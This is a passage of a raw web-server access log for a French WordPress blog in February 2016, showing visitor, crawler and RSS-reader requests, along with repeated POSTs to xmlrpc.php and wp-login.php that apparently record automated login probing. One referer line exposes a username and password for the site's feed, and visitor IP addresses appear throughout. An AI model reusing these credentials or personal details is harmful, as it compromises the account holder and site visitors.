AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n193.248.63.25 - - [10/Feb/2016:06:21:16 -0800] \"GET /wp-content/uploads/2015/03/Screenshot-2015-03-13-20.20.39-1024x165.png HTTP/1.1\" 200 203835 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n91.212.124.146 - - [10/Feb/2016:06:22:50 -0800] \"POST /wp-login.php HTTP/1.1\" 200 3733 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3\"\n46.149.69.243 - - [10/Feb/2016:06:28:29 -0800] \"GET /favicon.ico HTTP/1.1\" 200 239 \"-\" \"Mozilla/5.0 (Linux; Android 4.4.2; GT-I9295 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 YaBrowser/15.12.2.6773.00 Yowser/2.5.3 Mobile Safari/537.36\"\n77.154.202.171 - - [10/Feb/2016:06:31:58 -0800] \"GET /wp-content/uploads/2014/04/tumblr_inline_n46um7CkZE1sa6hof-50x50.jpg HTTP/1.1\" 200 2425 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4\"\n68.180.228.42 - - [10/Feb/2016:06:32:26 -0800] \"GET /robots.txt HTTP/1.1\" 200 327 \"-\" \"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)\"\n91.103.43.50 - - [10/Feb/2016:06:35:07 -0800] \"GET /wp-content/uploads/2014/07/tumblr_inline_n7zuk0v8WY1sa6hof-50x50.jpg HTTP/1.1\" 304 188 \"-\" \"Mozilla/4.0 (compatible;)\"\n80.13.10.184 - - [10/Feb/2016:06:38:03 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n80.13.10.184 - - [10/Feb/2016:06:38:17 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n80.13.10.184 - - [10/Feb/2016:06:38:39 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n130.0.236.153 - - [10/Feb/2016:06:44:55 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n130.0.236.153 - - [10/Feb/2016:06:50:42 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n130.0.236.153 - - [10/Feb/2016:06:53:53 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n62.210.250.66 - - [10/Feb/2016:06:59:14 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n207.46.13.160 - - [10/Feb/2016:07:02:31 -0800] \"GET /wp-content/uploads/2015/02/1620528_10152406520622652_278602715_n-300x225.jpg HTTP/1.1\" 200 32896 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n80.12.89.109 - - [10/Feb/2016:07:05:03 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6228 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n80.12.89.109 - - [10/Feb/2016:07:05:03 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 867 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n80.12.89.109 - - [10/Feb/2016:07:05:03 -0800] \"GET /wp-content/plugins/wp-shortcode/js/jquery.tipsy.js?ver=4.1.1 HTTP/1.1\" 200 3066 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n80.12.89.109 - - [10/Feb/2016:07:05:03 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n80.12.89.109 - - [10/Feb/2016:07:05:04 -0800] \"GET /wp-content/uploads/2014/07/tumblr_inline_n99vb998z21sygmpd-50x50.jpg HTTP/1.1\" 200 2503 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n80.12.89.109 - - [10/Feb/2016:07:05:04 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n62.210.142.23 - jez [10/Feb/2016:07:06:06 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://jez:lumn0h3D@techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n80.12.89.109 - - [10/Feb/2016:07:09:01 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6229 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; Android 5.1.1; A0001 Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n80.12.89.109 - - [10/Feb/2016:07:09:01 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; Android 5.1.1; A0001 Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n80.12.89.109 - - [10/Feb/2016:07:09:01 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; Android 5.1.1; A0001 Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n80.12.89.109 - - [10/Feb/2016:07:09:01 -0800] \"GET /wp-includes/js/comment-reply.min.js?ver=4.1.1 HTTP/1.1\" 200 757 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; Android 5.1.1; A0001 Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n80.12.89.109 - - [10/Feb/2016:07:09:02 -0800] \"GET /wp-content/uploads/2015/06/unnamed-50x50.jpg HTTP/1.1\" 200 2395 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; Android 5.1.1; A0001 Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n80.12.89.109 - - [10/Feb/2016:07:09:02 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Linux; Android 5.1.1; A0001 Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n80.12.89.109 - - [10/Feb/2016:07:09:02 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; Android 5.1.1; A0001 Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n80.12.89.109 - - [10/Feb/2016:07:11:15 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/ HTTP/1.1\" 200 15537 \"-\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n80.12.89.109 - - [10/Feb/2016:07:11:25 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/?cf_action=sync_comments&post_id=30 HTTP/1.1\" 200 309 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n92.222.20.166 - - [10/Feb/2016:07:12:31 -0800] \"GET /rss HTTP/1.1\" 304 163 \"-\" \"Tiny Tiny RSS/16.1 (c352248) (http://tt-rss.org/)\"\n66.249.69.73 - - [10/Feb/2016:07:15:03 -0800] \"GET /sitemap-pt-post-2015-06.xml HTTP/1.1\" 200 881 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n62.149.143.108 - - [10/Feb/2016:07:18:40 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 793 \"-\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0\"\n62.210.250.66 - - [10/Feb/2016:07:23:37 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n130.0.236.153 - - [10/Feb/2016:07:27:02 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n62.210.188.36 - - [10/Feb/2016:07:30:20 -0800] \"GET /wp-content/uploads/2015/02/1620528_10152406520622652_278602715_n-300x300.jpg HTTP/1.1\" 200 37378 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (iPad; CPU OS 7_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A406 Safari/8536.25\"\n62.210.188.36 - - [10/Feb/2016:07:30:20 -0800] \"GET /wp-content/uploads/2015/03/1-l57K-8uyN9ELuGbgcaItmw-1024x524.png HTTP/1.1\" 200 190496 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (iPad; CPU OS 7_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A406 Safari/8536.25\"\n209.190.96.34 - - [10/Feb/2016:07:32:04 -0800] \"GET /wp-content/uploads/2015/03/4N8A4857-1024x683.jpg HTTP/1.1\" 200 115506 \"-\" \"Java/1.7.0_10\"\n209.190.95.66 - - [10/Feb/2016:07:32:04 -0800] \"GET /wp-content/uploads/2015/03/Screenshot-2015-03-13-20.20.39-1024x165.png HTTP/1.1\" 200 203836 \"-\" \"Java/1.7.0_10\"\n130.0.236.153 - - [10/Feb/2016:07:36:19 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n185.33.41.198 - - [10/Feb/2016:07:38:43 -0800] \"GET /wp-content/uploads/2015/02/1620528_10152406520622652_278602715_n-300x300.jpg HTTP/1.1\" 200 37378 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:44.0) Gecko/20100101 Firefox/44.0\"\n185.33.41.198 - - [10/Feb/2016:07:38:43 -0800] \"GET /wp-content/uploads/2015/03/1-l57K-8uyN9ELuGbgcaItmw-1024x524.png HTTP/1.1\" 200 190496 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:44.0) Gecko/20100101 Firefox/44.0\"\n78.125.214.227 - - [10/Feb/2016:07:39:48 -0800] \"GET /wp-content/uploads/2015/02/10527525_10153205547817652_3810498128776234928_n-300x300.jpg HTTP/1.1\" 200 34314 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.3; ARM; Trident/7.0; Touch; rv:11.0) like Gecko\"\n78.125.214.227 - - [10/Feb/2016:07:39:48 -0800] \"GET /wp-content/uploads/2015/03/1-4hdrSSvSgHd6oa4AL5KK3Q.jpeg HTTP/1.1\" 200 174731 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.3; ARM; Trident/7.0; Touch; rv:11.0) like Gecko\"\n66.147.240.154 - - [10/Feb/2016:07:40:55 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 793 \"-\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0\"\n66.249.69.65 - - [10/Feb/2016:07:43:12 -0800] \"GET /marketing-pour-developpeurs-partie-3-le-site/ HTTP/1.1\" 200 10926 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n68.180.228.42 - - [10/Feb/2016:07:45:33 -0800] \"GET /?p=325 HTTP/1.1\" 301 394 \"-\" \"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)\"\n193.164.197.233 - - [10/Feb/2016:07:46:58 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n193.164.197.233 - - [10/Feb/2016:07:47:10 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n130.0.236.153 - - [10/Feb/2016:07:48:29 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n24.5.199.149 - - [10/Feb/2016:07:51:27 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33586 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4\"\n24.5.199.149 - - [10/Feb/2016:07:51:27 -0800] \"GET /wp-content/plugins/wp-shortcode/js/wp-shortcode.js?ver=4.1.1 HTTP/1.1\" 200 831 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4\"\n24.5.199.149 - - [10/Feb/2016:07:51:27 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/disqus.js?ver=4.1.1 HTTP/1.1\" 200 1101 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4\"\n24.5.199.149 - - [10/Feb/2016:07:51:27 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 505 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4\"\n24.5.199.149 - - [10/Feb/2016:07:51:28 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4\"\n24.5.199.149 - - [10/Feb/2016:07:51:28 -0800] \"GET /wp-content/uploads/2014/12/tumblr_inline_nfq2o82z0r1sa6hof-50x50.jpg HTTP/1.1\" 200 2106 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4\"\n24.5.199.149 - - [10/Feb/2016:07:51:35 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/?cf_action=sync_comments&post_id=30 HTTP/1.1\" 200 309 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4\"\n62.210.250.66 - - [10/Feb/2016:07:52:00 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n62.210.250.66 - - [10/Feb/2016:07:55:07 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n62.210.250.66 - - [10/Feb/2016:07:58:15 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n50.62.161.20 - - [10/Feb/2016:08:02:41 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 793 \"-\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0\"\n130.0.236.153 - - [10/Feb/2016:08:06:32 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n68.180.228.42 - - [10/Feb/2016:08:12:28 -0800] \"GET /a-quoi-ca-sert-un-co-fondateur-non-technique/ HTTP/1.1\" 200 10037 \"-\" \"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)\"\n62.210.250.66 - - [10/Feb/2016:08:14:35 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n109.26.130.102 - - [10/Feb/2016:08:17:28 -0800] \"GET /wp-content/uploads/2015/02/10527525_10153205547817652_3810498128776234928_n-300x300.jpg HTTP/1.0\" 200 34314 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n109.26.130.102 - - [10/Feb/2016:08:17:29 -0800] \"GET /wp-content/uploads/2015/03/4N8A4857-1024x683.jpg HTTP/1.0\" 200 115505 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n78.228.215.147 - - [10/Feb/2016:08:19:39 -0800] \"GET /wp-content/uploads/2015/02/10527525_10153205547817652_3810498128776234928_n-300x300.jpg HTTP/1.1\" 200 34314 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n78.228.215.147 - - [10/Feb/2016:08:19:39 -0800] \"GET /wp-content/uploads/2015/03/4N8A4857-1024x683.jpg HTTP/1.1\" 200 115506 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n188.165.96.114 - - [10/Feb/2016:08:22:00 -0800] \"GET /paul-duan-le-super-heros-de-la-data-science-pour/ HTTP/1.1\" 200 10085 \"http://rue89.nouvelobs.com/2015/09/29/petit-genie-francais-silicon-valley-a-legende-261418\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n188.165.96.114 - - [10/Feb/2016:08:22:00 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n188.165.96.114 - - [10/Feb/2016:08:22:00 -0800] \"GET /wp-content/themes/great/js/customscript.js HTTP/1.1\" 200 3600 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n188.165.96.114 - - [10/Feb/2016:08:22:00 -0800] \"GET /wp-content/plugins/wp-shortcode/js/wp-shortcode.js?ver=4.1.1 HTTP/1.1\" 200 831 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n188.165.96.114 - - [10/Feb/2016:08:22:00 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n188.165.96.114 - - [10/Feb/2016:08:22:00 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n188.165.96.114 - - [10/Feb/2016:08:22:00 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n207.46.13.29 - - [10/Feb/2016:08:22:19 -0800] \"GET /post/96006277128/xavier-mouton-dubosc-le-developpeur-aux-mille HTTP/1.1\" 301 365 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n62.210.250.66 - - [10/Feb/2016:08:24:57 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n130.0.236.153 - - [10/Feb/2016:08:27:48 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n198.58.102.96 - - [10/Feb/2016:08:32:14 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n185.65.251.46 - - [10/Feb/2016:08:34:26 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/le-jour-ou-les-startups-tech-nauront-plus-de/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n185.65.251.46 - - [10/Feb/2016:08:34:26 -0800] \"GET /wp-content/plugins/wp-shortcode/js/jquery.tipsy.js?ver=4.1.1 HTTP/1.1\" 200 3065 \"http://techmeup.co/le-jour-ou-les-startups-tech-nauront-plus-de/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n185.65.251.46 - - [10/Feb/2016:08:34:26 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/le-jour-ou-les-startups-tech-nauront-plus-de/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n185.65.251.46 - - [10/Feb/2016:08:34:26 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/le-jour-ou-les-startups-tech-nauront-plus-de/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n185.65.251.46 - - [10/Feb/2016:08:34:26 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n185.65.251.46 - - [10/Feb/2016:08:34:27 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 437 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n199.16.156.124 - - [10/Feb/2016:08:36:12 -0800] \"GET /post/98008044383/trouver-un-job-tech-a-san-francisco-ou-dans-la-silicon HTTP/1.1\" 301 318 \"-\" \"Twitterbot/1.0\"\n80.13.10.184 - - [10/Feb/2016:08:37:01 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/ HTTP/1.1\" 200 15492 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko)\"\n80.13.10.184 - - [10/Feb/2016:08:37:15 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n80.13.10.184 - - [10/Feb/2016:08:37:33 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1\"\n130.0.236.153 - - [10/Feb/2016:08:42:29 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n157.130.196.214 - - [10/Feb/2016:08:45:51 -0800] \"GET /wp-content/uploads/2015/02/10527525_10153205547817652_3810498128776234928_n-300x300.jpg HTTP/1.1\" 200 34314 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0\"\n157.130.196.214 - - [10/Feb/2016:08:45:51 